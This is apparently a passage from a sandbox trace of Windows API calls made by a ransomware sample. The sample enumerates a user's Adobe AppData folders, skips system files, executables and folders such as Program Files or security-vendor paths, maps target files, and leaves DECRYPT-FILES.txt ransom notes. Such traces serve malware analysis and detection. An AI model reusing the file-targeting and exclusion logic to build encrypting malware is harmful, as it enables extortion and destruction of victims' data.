(lpString1="IZjmQ", lpString2="dll") returned 1 [0179.870] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0179.870] lstrlenW (lpString="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ") returned 50 [0179.870] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0179.871] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ" [0179.871] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.izjmq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0179.871] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x36fd5b8 | out: lpFileSize=0x36fd5b8*=1197) returned 1 [0179.871] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0179.871] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.979] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.979] CloseHandle (hObject=0x290) returned 1 [0179.979] CloseHandle (hObject=0x28c) returned 1 [0179.979] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.979] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda3e4ea0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda3e4ea0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa054260, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x944f, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", cAlternateFileName="A9B821~1.ZD8")) returned 1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="DECRYPT-FILES.txt") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="autorun.inf") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="boot.ini") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="desktop.ini") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="ntuser.dat") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="iconcache.db") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="bootsect.bak") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="ntuser.dat.log") returned -1 [0179.979] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="thumbs.db") returned -1 [0179.980] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX", lpString2="Bootfont.bin") returned -1 [0179.980] lstrlenW (lpString="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX") returned 50 [0179.980] lstrcmpiW (lpString1="Zd8GX", lpString2="lnk") returned 1 [0179.980] lstrcmpiW (lpString1="Zd8GX", lpString2="exe") returned 1 [0179.980] lstrcmpiW (lpString1="Zd8GX", lpString2="sys") returned 1 [0179.980] lstrcmpiW (lpString1="Zd8GX", lpString2="dll") returned 1 [0179.980] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0179.980] lstrlenW (lpString="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX") returned 50 [0179.980] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0179.980] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX" [0179.980] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.zd8gx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0179.981] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x36fd5b8 | out: lpFileSize=0x36fd5b8*=37967) returned 1 [0179.981] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0179.981] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.983] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.983] CloseHandle (hObject=0x290) returned 1 [0179.983] CloseHandle (hObject=0x28c) returned 1 [0179.983] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.984] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa007fa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.984] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.984] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa007fa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.984] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0179.984] CloseHandle (hObject=0x284) returned 1 [0179.984] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fbbce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.984] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.984] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fbbce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.984] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0179.984] CloseHandle (hObject=0x27c) returned 1 [0179.984] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa007fa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa007fa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security\\", cAlternateFileName="")) returned 0 [0179.984] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0179.984] CloseHandle (hObject=0x274) returned 1 [0179.985] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.985] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.985] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.985] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0179.985] CloseHandle (hObject=0x26c) returned 1 [0179.985] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.985] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.985] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0179.985] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0179.985] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0179.985] lstrcatW (in: lpString1="Flash Player", lpString2="\\" | out: lpString1="Flash Player\\") returned="Flash Player\\" [0179.985] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Program Files") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch=":\\Windows") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Games\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\All Users") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="AhnLab") returned 0x0 [0179.985] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.985] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0179.985] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.986] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\0a16c9.tmp") returned 76 [0179.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0179.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0179.992] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.992] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\DECRYPT-FILES.txt") returned 83 [0179.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.996] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0179.996] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0179.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee68a500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee68a500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0179.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.997] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee68a500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee68a500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.997] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee68a500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee68a500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee68a500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.997] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.997] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.997] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.997] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.997] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.997] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.997] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0179.997] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.997] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\" [0179.997] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\0a16c9.tmp" [0179.997] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.998] CloseHandle (hObject=0x0) returned 0 [0179.998] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.998] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 1 [0179.998] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0179.998] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0179.998] lstrcatW (in: lpString1="AssetCache", lpString2="\\" | out: lpString1="AssetCache\\") returned="AssetCache\\" [0179.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="AssetCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Program Files") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch=":\\Windows") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Games\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.998] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 